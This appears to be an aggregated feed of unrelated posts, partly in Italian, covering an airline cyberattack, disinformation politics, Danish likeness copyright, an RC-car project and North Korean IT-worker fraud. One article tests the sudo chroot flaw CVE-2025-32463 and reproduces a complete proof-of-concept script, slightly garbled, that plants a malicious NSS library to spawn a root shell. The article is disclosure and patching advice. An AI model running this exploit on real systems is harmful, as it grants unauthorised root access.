Hawaiian Airlines, una delle 10 principali compagnie aeree commerciali degli Stati Uniti, sta indagando su un attacco informatico che ha compromesso alcuni dei suoi sistemi. Gli esperti ritengono che il responsabile della violazione possa essere il gruppo Scattered Spider.

In una dichiarazione ufficiale, la compagnia riferisce che l’incidente informatico non ha compromesso la sicurezza del volo e che tutte le autorità competenti sono già state informate dell’accaduto. Hawaiian Airlines ha inoltre coinvolto esperti esterni di sicurezza informatica nelle indagini, che stanno attualmente contribuendo a valutare l’impatto dell’attacco e a ripristinare i sistemi interessati.

“Hawaiian Airlines sta risolvendo un problema di sicurezza informatica che ha avuto un impatto su diversi dei nostri sistemi IT. La nostra massima priorità è la sicurezza dei nostri clienti e dipendenti. Abbiamo adottato misure per proteggere le operazioni e tutti i voli stanno operando normalmente e in sicurezza”, ha dichiarato la compagnia aerea.

Un banner sul sito web della compagnia aerea afferma che l’incidente non ha avuto alcun impatto sulla sicurezza o sugli orari dei voli. Un messaggio simile è pubblicato sul sito web di Alaska Airlines, di proprietà di Alaska Air Group, la società che ha acquisito Hawaiian Airlines lo scorso anno.

Al momento non è chiaro se i sistemi di Hawaiian Airlines siano stati colpiti da un ransomware che li ha crittografati o se siano stati disattivati ​​per impedire attacchi informatici. Nessun gruppo di hacker ha ancora rivendicato la responsabilità dell’attacco. Vale la pena notare che la compagnia aerea canadese WestJet ha subito un attacco simile all’inizio di questo mese, e l’attacco ha compromesso la disponibilità dell’app e del sito web della compagnia aerea.

Nel frattempo, nel fine settimana, l’FBI , Google Mandiant e Palo Alto Networks hanno diramato un avviso congiunto in merito all’attività del gruppo di hacker Scattered Spider, che ora potrebbe prendere di mira aziende nei settori dell’aviazione e dei trasporti. L’FBI ha osservato che Scattered Spider in genere ricorre all’ingegneria sociale per accedere ai sistemi delle vittime e che gli hacker possono prendere di mira anche fornitori e appaltatori di compagnie aeree di fiducia. Secondo Axios invece, anche l’attacco a WestJet sopra menzionato potrebbe essere opera di Scattered Spider.

L'articolo Hawaiian Airlines sotto attacco hacker, sistemi compromessi proviene da il blog della sicurezza informatica.

Portable Driver Installation and Update Tool
Free and open source Windows driver installation
Install Missing Drivers and Update Old Drivers

Snappy Driver Installer Origin is a portable Windows tool to install and update device drivers. It can be used offline to install drivers where Internet isn’t available. No more searching for drivers after a clean install, just let Snappy Driver Installer Origin do it’s thing and your job will be done in no time. The perfect technician’s tool.

snappy-driver-installer.org/

#driverpack #Install #Installer #Driver #sdi #SDIO #foss #opensource #free

the-federation.info/
podupti.me/

#federation #Fediverse #p2p #social

KIA ORA. IT'S WEDNESDAY, AND THIS IS DIGITAL POLITICS. I'm Mark Scott, and this week's edition comes to you from New Zealand. I'm taking a couple weeks off, so the next newsletter (for paying subscribers) will hit inboxes on July 14.

I'm trying something different this week.

Ahead of the 2024 global megacycle of elections, I had the idea of explaining the links between the digital tactics that have now become all too common in how politicians get elected from Pakistan and Portugal to the United Kingdom and the United States.

Life, however, got in the way. (The best I did was this package around artificial intelligence, disinformation and elections.) So, I'm taking another crack at how we all now live in the Fake News Factory.

Let's get started:

The democratization of online tools and tactics

THE LAST DECADE REPRESENTED the second generation of social media. It was an era where the shine had significantly come off Facebook and Twitter (now X.) It was a time of repeated whistleblower reports about tech giants understanding how their content algorithms were pushing people toward polarizing and extremist content. It was a time of serious commercialization of these platforms by politicians eager to bombard would-be voters with billions of dollars of collective ad buys.

That era is now over. It's not that Facebook and YouTube are no longer important. They are — especially YouTube which has transformed itself into a global rival for traditional television in a way that has upended the advertising industry and fundamentally reshaped how anyone under 30-years old consumes video content. But where the 2015-2025 period was primarily defined by the dominance of a small number of Silicon Valley platforms, we're now in an era where fringe platforms, niche podcasts and the likes of vertical dramas have divided people into small online communities that rarely interact with each other.

This was happening before 2025. But we have reached an inflection point in how the online information ecosystem works. It has now shattered into a million pieces where people gravitate to like-minded individuals in siloed platforms. There is no longer a collective set of facts or events that form the foundation for society. Instead, most of us seek out opinions that already reflect our worldview, often demonizing those who we disagree with in an "othering" that only fuels polarization, misunderstanding and, potentially, offline harm.

And you thought this would be an uplifting newsletter.

Thanks for reading the free monthly version of Digital Politics. Paid subscribers receive at least one newsletter a week. If that sounds like your jam, please sign up here.

Here's what paid subscribers read in June:
— Debunking popular misconceptions around platform governance; The demise of the open, interoperable internet is upon us; How oversight over AI has drastically slowed since 2023. More here.
— Internal fighting among Big Tech giants has hobbled any pushback against antitrust enforcement; It's time to rethink our approach to tackling foreign interference; Tracking Europe's decade-long push to combat online disinformation. More here.
— Why the G7 has always been a nothing-burger on tech policy; You should keep an eye out on 'digital public infrastructure' in the battle around tech sovereignty; the United Kingdom's expanding online safety investigations. More here.
— The US is sending seriously mixed messages about its approach to tech policy; How the UK became the second place in the world to mandate social media data access; Artificial intelligence will upend how we consume news online. More here.

This bifurcation in how people consume online content has made it next to impossible for foreign interference operations to flourish like they once did. See, there's a positive point. Even two years ago, the Russians could flood the zone with Kremlin talking points and receive a significant bump in online interactions. The Chinese never went in for that sort of thing — though have progressively targeted Western audiences mostly with overt propaganda in support of the Chinese Communist Party.

Now, such efforts are almost certainly doomed to fail. The siloing of social media usage has been married with a need for authenticity — that sense of belonging and insider knowledge that can only come from deep roots in communities that can smell out an imposter from a mile off. That authenticity is something that foreign (covert) campaigns routinely do badly at. State-backed operations don't know the insider lingo; they don't have the long-standing credibility built up over months/years; and they don't have personal ties required to fully embed in the balkanization of social media.

But where state-backed actors remain a threat is in the amplification of existing domestic influencers often by automated bot-nets and other AI-powered tools aimed at juicing social media giants' recommender systems. The companies say they are on top of these covert tactics. But every time there's a massive global political event (or local election), Kremlin-backed narratives keep popping up in people's feeds — often via local influencers whose views just happen to align with Moscow. These individuals are mostly not connected with Russia. But they have likely received a boost from Kremlin-aligned groups seeking to spread those messages to the widest audience possible.

It's about domestic, not foreign

IN TRUTH, STATE-BACKED ACTORS are a very public sideshow to the main event driving ongoing toxicity within the information environment: domestic actors. Be they influencers, scammers, politically-aligned media or, ahem, politicians, they are the key instigator for much of the current. Many of these domestic players see some form of benefit from spreading harm, falsehoods and, in some cases, illegality online. That, it should be added, is then amplified by social media platforms' algorithms that have been programmed to entice people to stay on these networks, often by promoting the most divisive content as possible.

Such a dynamic has been around for years. It isn't a left- or right-wing issue — though repeated studies have shown that conservative social media users promote more falsehoods than their liberal counterparts. It's a basic fact that domestic social media users both know their audience better than foreign influence campaigns and that they have greater credibility with siloed local audiences than Russia, China or Iran.

What has shifted, though, is the ability for almost anyone to run a domestic influence campaign — or, you know, a mainstream political campaign — as if they had the resources of the Kremlin-backed Internet Research Agency. Over the last five years, the toolkit required to skew social media has become readily accessible and significantly cheaper than it once was. That has been spurred on even more through the rapid growth of AI-enabled tools (more on that below.) But everything from a Bangladesh-based bot farm to a Philippines-based dark arts public relations has now become an off-the-shelf product that can be bought via a few clicks on a public-facing website.

This shift has not gone unnoticed by criminals. In 2025, the highest volume of attacks in the (Western) information environment now come from those seeking to dupe social media users out of money — and not to alter their political allegiances. Yes, the impact on politics can have significantly bigger effects. But the rise of "financial disinformation" in terms of frauds and scams promoted on social media has reached pandemic proportions.

Collectively, such digital efforts to swindle people out of money now costs billions of dollars a year, and even that is likely a significant underestimate. It's also directly linked to a crime (aka fraud) when scammers buy social media adverts to convince people to sign up to Ponzi and other get-rich-quick schemes. I did a quick search, via Meta's ad library in six different countries, for such financial scams, and found a prolific amount of advertising that promoted such disinformation. Some of it was blatantly illegal, some of it was not (I'm not linking to it to avoid amplification.) But the fact such scam artists are openly flaunting the law should be a worry for us all.

This democratization of disinformation has only gone from bad to worse with AI tools. Be it cloning technology to spoof a victim's voice, AI-generated images attacking a political opponent or next-generation video software that creates falsehoods from scratch within minutes, the cost for generating toxicity, hate and polarization is now almost zero. Yes, these tools can also generate joy, laughter and entertainment. But the last six months have seen a rapid rise in AI-generated slop that is quickly moving from being easy to detect to being indistinguishable from the real thing.

Trust me, I'm a regulator

THIS YEAR MARKS THE FIRST TIME ON RECORD that several countries' online safety rulebooks are in full operation. Yes, Australia got things started almost five years ago. But with the European Union's Digital Services Act and the UK's Online Safety Act, the Western world has the first signs of what a well-resourced regulatory environment looks like when it comes to keeping people safe online.

Sigh.

It's not that the European Commission and Ofcom (disclaimer: I sit on an independent advisory committee at the British regulator, so anything I say here is done so in a personal capacity) aren't doing their best. They are. It's just both are fighting a 2020 war against perceived threats within the online information environment, and just haven't kept pace with the fast-evolving tactics, some of which I outlined above.

To a degree, the time lag is understandable. Regulators are always going to be behind the curve on the latest threats. Both agencies are still staffing up and learning the ropes of their new rulebooks. How successful either the EU or UK will be in making their online worlds safer for citizens won't be known for at least five years, at the earliest.

But there have been some serious mistakes, especially from the European Commission. Let's leave aside the political nature of the first investigations under the Digital Services Act. And let's leave aside the internal bureaucratic infighting that was always going to arise from such a powerful — and well-resourced — piece of legislation.

For me, the biggest error was how Ursula von der Leyen framed the new rules as almost exclusively a means for combatting Russian interference. That was done primarily to secure her second tenure as European Commission president. But the characterization of the Digital Services Act as an all-powerful mechanism to thwart the Kremlin's covert influence operations has continued well into this year — most notably in the two presidential elections in Romania.

Sign up for Digital Politics

Thanks for getting this far. Enjoyed what you've read? Why not receive weekly updates on how the worlds of technology and politics are colliding like never before. The first two weeks of any paid subscription are free.

Subscribe
Email sent! Check your inbox to complete your signup.

No spam. Unsubscribe anytime.

Let's be clear. These online safety rules are many things. But, at their heart, they are wonky, bureaucratic and cumbersome mandatory requirements for platforms to abide by their own internal policies against illegal content. They are not about Russian disinformation. And they certainly are not about censorship.

Weaponization and unknown unknowns

And that takes me to the final big concern within the Fake News Factory: the weaponization of online safety rules. Since 2016, there have been those within the US that pushed back hard against platforms' efforts to quell illegal and abusive content. That has spiralled into conspiratorial claims that a Censorship Industrial Complex — made up of governments, social media giants and outsiders — is trying to illegally silence predominantly rightwing voices, often via new online safety legislation.

US President Donald Trump's administration has made it clear what it thinks of these rules — and has pushed back hard. It has threatened retaliatory tariffs against countries with online safety rules on the books. It has threatened to ban anyone who allegedly tries to censor Americans from entering the country. It has accused both the UK and EU of infringing on US First Amendment rights.

These attacks against what are, essentially, legal commitments obligating companies to live by their own internal rules — and to demonstrate that they have done so — are now part of the conversation in other Western countries. That includes (mostly) right-wing lawmakers across Europe seeking to weaken these online safety rules, accusing others of censoring conservative viewpoints and mimicking many of the long-standing talking points from their US counterparts.

It's true, particularly during the pandemic, that social media companies made content moderation decisions with imperfect facts. Some posts were unfairly removed or downranked as these firms responded, in real time, to government efforts to amplify scientifically correct information. But the rise of conspiracy theories, which insinuated a mass censoring of online voices, just didn't bear out with the evidence at hand. And that came after repeated reports from the US House of Representatives select subcommittee on the weaponization of the federal government.

If there was evidence of such abuse, then I would be the first to champion such findings. But as we enter the second half of the year, there is one core underlying fact that underpins everything I've written so far: no one has a clue about what happens on these platforms.

Long-time Digital Politics readers will have heard mego on about this for months — and, to be fair, it's part of my day job to look into this issue. But how the complex recommender system algorithms interact with people's individual posts, paid-for advertising and wider efforts to influence people online remains a black box. What I have outlined above, for instance, is based on my own research, what I understand anecdotally about how these platforms work and discussions with policymakers, tech executives and other experts.

The Fake News Factory is my own imagining of how the current online information ecosystem interacts and shapes the world around us. But without better awareness — via mandatory requirements that these firms open up to independent scrutiny, transparency and accountability — about the inner workings of these platforms, that imagining will remain incomplete, at best.

We are entering a new generation of social media with limited awareness, mass balkanization and an increasingly politicization of what should be clear objectives of keeping everyone safe online. How long this era will stick around for is anyone's guess. But, for now, the Fake News Factory remains as strong as ever.

What I'm reading

— The Organization for Economic Cooperation and Development analyzed the so-called age assurance policies from 50 online services — most of which did not have checks in place. More here.

— The team at the DSA Observatory did a deep dive into how individuals, non-profit organizations and consumer groups can bring private enforcement actions under the EU's Digital Services Act.

— The UK's Competition and Markets Authority laid out its rationale for why it had designated Google a so-called "strategic market status" under the country's new digital antitrust rules. More here.

— OpenAI submitted recommendations to the upcoming US AI Action Plan. The words "freedom" and "PRC" are mentioned repeatedly throughout. More here.

— Researchers at USC Annenberg looked at how the media covered the negative side of social media/technology, and found that the companies are rarely blamed. More here.

digitalpolitics.co/newsletter0…

Normally when a government extends a piece of copyright law we expect it to be in the favour of commercial interests with deep pockets and little care for their consumers. But in Denmark they do things differently it seems, which is why they are giving Danes the copyright over their own features such as their faces or voices. Why? To combat deepfakes, meaning that if you deepfake a Dane, they can come after you for big bucks, or indeed kronor. It’s a major win, in privacy terms.

You might of course ask, whether it’s now risky to photograph a Dane. We are not of course lawyers here but like any journalists we have to possess a knowledge of how copyright works, and we are guessing that the idea in play here is that of passing off. If you take a photograph of a Volkswagen you will have captured the VW logo on its front, but the car company will not sue you because you are not passing off something that’s not a Volkswagen as the real thing. So it will be with Danes; if you take a picture of their now-copyrighted face in a crowd you are not passing it off as anything but a real picture of them, so we think you should be safe.

We welcome this move, and wish other countries would follow suit.

Pope Francis, Midjourney, Public domain, (Which is a copyright story all of its own!)

hackaday.com/2025/07/02/finall…

Nella giornata di ieri, Red Hot Cyber ha pubblicato un approfondimento su una grave vulnerabilità scoperta in SUDO (CVE-2025-32463), che consente l’escalation dei privilegi a root in ambienti Linux sfruttando un abuso della funzione chroot.

L’exploit, reso pubblico da Stratascale, dimostra come un utente non privilegiato possa ottenere l’accesso root tramite una precisa catena di operazioni che sfruttano un comportamento errato nella gestione dei processi figli in ambienti chroot.

Test sul campo: la parola a Manuel Roccon del gruppo HackerHood

Manuel Roccon, ricercatore del gruppo HackerHood di Red Hot Cyber, ha voluto mettere le mani sull’exploit per verificarne concretamente la portata e valutarne la replicabilità in ambienti reali. “Non potevo resistere alla tentazione di provarlo in un ambiente isolato. È impressionante quanto sia diretto e pulito il meccanismo, una volta soddisfatti i requisiti richiesti dal PoC”, afferma Manuel.

Il team ha quindi testato il Proof of Concept pubblicato da Stratascale Exploit CVE-2025-32463 – sudo chroot. Il risultato? Privilege escalation ottenuta con successo.

youtube.com/embed/-GxiqS-f7Yg?…

Dettagli dell’exploit

L’exploit sfrutta una condizione in cui sudo esegue un comando in un ambiente chroot, lasciando tuttavia aperte alcune possibilità al processo figlio di uscire dal chroot e di manipolare lo spazio dei nomi dei processi (namespace) fino ad ottenere accesso completo come utente root.

L’exploit CVE-2025-32463, dimostrato nel PoC sudo-chwoot.sh di Rich Mirch (Stratascale CRU), sfrutta una vulnerabilità in sudo che consente a un utente non privilegiato di ottenere privilegi di root quando sudo viene eseguito con l’opzione -R (che specifica un chroot directory). Lo script crea un ambiente temporaneo (/tmp/sudowoot.stage.*), compila una libreria condivisa malevola (libnss_/woot1337.so.2) contenente una funzione constructor che eleva i privilegi e apre una shell root (/bin/bash), e forza sudo a caricarla come libreria NSS nel contesto chroot.

La tecnica sfrutta un errore logico nella gestione della libreria NSS in ambienti chroot, dove sudo carica dinamicamente librerie esterne senza isolarle correttamente. Lo script imposta infatti una finta configurazione nsswitch.conf per forzare l’uso della propria libreria, posizionandola all’interno della directory woot/, che funge da root virtuale per il chroot. Quando sudo -R woot woot viene eseguito, la libreria woot1337.so.2 viene caricata, e il codice eseguito automaticamente grazie all’attributo __attribute__((constructor)), ottenendo così l’escalation dei privilegi.

I requisiti fondamentali per sfruttare con successo questa vulnerabilità includono:

• L’abilitazione dell’uso di chroot tramite sudo.
• L’assenza di alcune restrizioni nei profili di sicurezza (come AppArmor o SELinux).
• Una configurazione permissiva di sudoers.

Di seguito le semplici righe

#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
# @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1

cat > woot1337.c
#include

__attribute__((constructor)) void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash", "/bin/bash", NULL);
}
EOF

mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}

Conclusioni

Il test effettuato da Manuel Roccon dimostra quanto questa vulnerabilità non sia solo teorica, ma pienamente sfruttabile in ambienti di produzione non correttamente protetti. In scenari DevOps o containerizzati, dove l’uso di sudo e chroot è comune, i rischi aumentano considerevolmente.

Red Hot Cyber e il gruppo HackerHood raccomandano l’immediato aggiornamento di SUDO all’ultima versione disponibile, e la revisione delle configurazioni di sicurezza relative a chroot e permessi sudoers.

La sicurezza parte dalla consapevolezza. Continuate a seguirci per analisi tecniche, PoC testati e segnalazioni aggiornate.

L'articolo Linux Pwned! Privilege Escalation su SUDO in 5 secondi. HackerHood testa l’exploit CVE-2025-32463 proviene da il blog della sicurezza informatica.

Our rights and freedoms – online and offline – are facing unprecedented threats. Recognising this as a collective struggle, we want to explore the theme Resilience and Resistance in Times of Deregulation and Authoritarianism for this edition of Privacy Camp. The 13th edition of Privacy Camp is set to take place on 30 September 2025.

The post #PrivacyCamp25: Call for Sessions open appeared first on European Digital Rights (EDRi).

Svolgo un lavoro d'ufficio (quindi niente di fisicamente pesante), al chiuso (quindi non sono esposto ai raggi solari diretti) ma nonostante questo dover lavorare a 30-31 °C è stato pesante, più di quanto pensassi.

Molti di noi sono sensibili al problema climatico ma mi sono accorto che, nel mio caso, era una sensibilità molto "razionale". Ho letto articoli, ho guardato i dati, ho osservato i grafici, ho preso atto del fatto che qualcosa non sta andando bene e che abbiamo davanti un problema di cui dobbiamo occuparci.

Non penso però di esagerare se dico che stare tre giorni interi senza aria condizionata (non ce l'ho neanche a casa, per scelta) a me ha fatto provare una vera e propria paura per la situazione in cui ci troviamo.

Credo di essere passato da una comprensione razionale del problema ad una percezione emotiva.

Mi sono domandato allora se il vivere immersi nell'aria condizionata non possa avere un effetto "anestetico", non possa essere qualcosa che ci impedisce di percepire fino in fondo la drammaticità della situazione in cui ci troviamo.

Sarebbe utile passare un paio di giorni a settimana senza nessuna forma di aria condizionata, tanto per riuscire a percepire correttamente quale sia l'emergenza che abbiamo di fronte. Purtroppo non è possibile, l'aria condizionata è dappertutto, e mi domando se non potrebbe essere questo uno dei motivo per cui tante persone non sembrano sufficientemente preoccupate dal problema climatico.

Modern RC cars can be pretty darn fast. That’s fun and all, but it also makes it easy to crash them into things. This problem inspired [Narrow Studios] to whip up something to offer a bit of protection.

The concept is simple enough—the RC car just needs some way to detect obstacles and stop before hitting them. The build relies on ultrasonic sensors as rangefinders to spot solid objects in the path of the vehicle. An Arduino Nano is in charge of reading the sensors. When it appears the car is approaching a wall or similar obstacle, it fires off a PWM signal to the car’s motor controller commanding it to brake. The additional hardware is held to the car with a bunch of custom printed brackets.

The setup isn’t perfect; the video notes that if you insist on accelerating quickly when close to a wall, you still have a fair chance of hitting it. That’s largely put down to the refresh time of the sensors and the overall system, which could be improved with further work. Still, if you’re always crashing your RC car into walls or curbs, this kind of thing might appeal to you.

We’ve featured some other great RC projects before, too.

youtube.com/embed/ht6-LsJQgek?…

hackaday.com/2025/07/02/adding…

Il Dipartimento di Giustizia degli Stati Uniti ha annunciato la scoperta di un sistema su larga scala in cui falsi specialisti IT provenienti dalla RPDC i quali ottenevano lavoro presso aziende americane fingendosi cittadini di altri Paesi. In effetti noi di Red Hot Cyber ne avevamo parlato da tempo sul fatto che molte aziende stavano assumendo impiegati nordcoreani, che svolgevano colloqui assunzionali anche attraverso sistemi deepfake.

Secondo quanto riferito, programmatori nordcoreani hanno ottenuto lavoro in oltre 100 aziende statunitensi utilizzando identità fittizie o rubate. Oltre allo stipendio, hanno rubato informazioni riservate e le hanno trasferite sui server di Pyongyang. Erano anche interessati alle criptovalute: in un caso, un agente nordcoreano ha rubato 740.000 dollari al suo datore di lavoro americano.

È importante notare che questa volta gli aggressori non hanno utilizzato deepfake, sebbene tali metodi stiano diventando sempre più popolari. Gli attacchi informatici rimangono un’importante fonte di finanziamento per la Corea del Nord, nonostante le sanzioni internazionali. Già nel 2022, l’FBI aveva avvertito che le autorità della RPDC stavano ufficialmente organizzando il lavoro da remoto dei propri programmatori all’estero.

Secondo i documenti del tribunale, una delle operazioni è iniziata nel gennaio 2021. Zhenxing “Danny” Wang, che aveva creato una società fittizia chiamata Independent Lab, presumibilmente impegnata nello sviluppo di software, è stato arrestato negli Stati Uniti. Attraverso questa società, ha trasferito 5 milioni di dollari alla RPDC, e le aziende americane hanno subito perdite per 3 milioni di dollari, tra ripristino dei sistemi e spese legali.

Un altro imputato, Kejia “Tony” Wang, ha organizzato due società di facciata e le cosiddette “laptop farm”. Le società inviavano computer ai loro “dipendenti”, ma i dispositivi rimanevano negli Stati Uniti e venivano controllati dalla Corea del Nord, il che permetteva loro di nascondere la vera ubicazione dei lavoratori. Di conseguenza, i partecipanti americani allo schema hanno guadagnato almeno 696.000 dollari.

Alcuni dei dipendenti coinvolti sono stati licenziati dopo le ispezioni. È stata scoperta anche un’altra operazione: quattro cittadini nordcoreani lavoravano come specialisti IT sotto falso nome negli Emirati Arabi Uniti, negli Stati Uniti e in Serbia, rubando criptovalute e riciclandole tramite Tornado Cash .

Dal 10 al 17 giugno, le autorità statunitensi hanno sequestrato 137 computer portatili da “fattorie” sospette in diversi stati. È prevista una ricompensa fino a 5 milioni di dollari per informazioni su tali attività.

L'articolo Hackers nordcoreani a libro paga. Come le aziende hanno pagato stipendi a specialisti IT nordcoreani proviene da il blog della sicurezza informatica.